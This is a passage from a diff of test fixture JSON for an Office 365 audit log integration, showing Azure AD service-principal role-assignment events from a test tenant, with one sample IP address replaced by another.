"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2295,9 +2295,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:06", "ExtendedProperties": [ { @@ -2531,7 +2531,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2561,9 +2561,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:47", "ExtendedProperties": [ { @@ -2797,7 +2797,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc